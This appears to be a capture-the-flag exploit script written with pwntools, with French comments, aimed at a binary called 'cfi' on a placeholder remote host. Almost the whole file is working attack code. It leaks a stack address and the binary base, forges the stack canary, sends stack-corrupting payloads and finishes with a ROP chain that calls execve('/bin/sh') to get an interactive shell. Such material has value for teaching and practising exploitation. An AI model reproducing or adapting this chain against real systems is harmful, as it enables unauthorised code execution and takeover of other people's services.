"""
Méthode : Leak → corruption → Prepare read → ROP → Shell

- Leak stack + base binaire (CFI bypass)
- Double Payload :
Premier : corruption stack + canary forgery
Deuxième : prépare appel à read() pour + de contrôle

- ROP Chain :
gets() 
Setup execve("/bin/sh", 0, 0)
rax = 0x3b (syscall number), rdi = "/bin/sh", rsi/rdx = 0
"""

from pwn import *

exe = ELF("./cfi")
io = remote("HOST", PORT)

io.recvuntil(b"> ")

# Envoyer l'option 1
io.sendline(b"1")

# Recevoir la réponse 
try:
    out = io.recvuntil(b"|  <", timeout=5).decode()
    ads = re.findall(r'0x[0-9a-fA-F]+', out)
    if len(ads) >= 2:
        stack = int(ads[0], 16)  # Adresse stack leakée
        exe.address = int(ads[1], 16) - 0x33e3 # Calcul base binaire

        pop_rcx = exe.address + 0x29b4  # pop rcx; ret;
        rcx_to_rax = exe.address + 0x29db  # mov rax, rcx; pop rcx; ret;
        pop_rdi = exe.address + 0x2746  # pop rdi; ret;
        pop_rsi = exe.address + 0x2b1a  # pop rsi; ret;
        mov_rdx = exe.address + 0x2c50  # mov rdx, [rsp+0x10]; syscall;
        call_addr = exe.address + 0x3542  # Adresse de read() dans le binaire
        canary = exe.sym['main'] + 0x1d5  # Canary 

        # Corrompre la stack
        pl1 = p64(0)*5 + p64(canary) + p64(0)*6 + p64(call_addr) + p64(canary) + p64(0)*210
        pl1 += p64(exe.address+0x7d00) + p64(0)*17 + p64(stack+0x58) + p64(0)*8 + p64(canary)

        # Préparer l'appel à read()
        pl2 = p64(canary) + p64(exe.sym['vuln']+129) + p64(stack+0x48) + p64(0) + p64(call_addr)

        io.sendlineafter(b"> ", b"5")
        io.sendlineafter(b"> ", pl1)
        io.recvuntil(b"> ")
        io.send(pl2)

        pl3 = p64(pop_rdi) + p64(stack+0x70) + p64(exe.plt.gets)  # gets()
        pl3 += p64(pop_rcx) + p64(0x3b) + p64(rcx_to_rax) + p64(0)  # rax = 0x3b (syscall execve)
        pl3 += p64(pop_rsi) + p64(0) + p64(pop_rdi) + p64(stack+0xa8)  # rdi = "/bin/sh", rsi = 0  
        pl3 += p64(mov_rdx) + b"/bin/sh\x00" + p64(0)*2  # rdx = 0, suivi de "/bin/sh"
 
        io.send(pl3)
        io.interactive()
    else:
        print("Erreur: pas assez d'adresses trouvées")
except Exception as e:
    print(f"Erreur: {e}")
    io.close() 
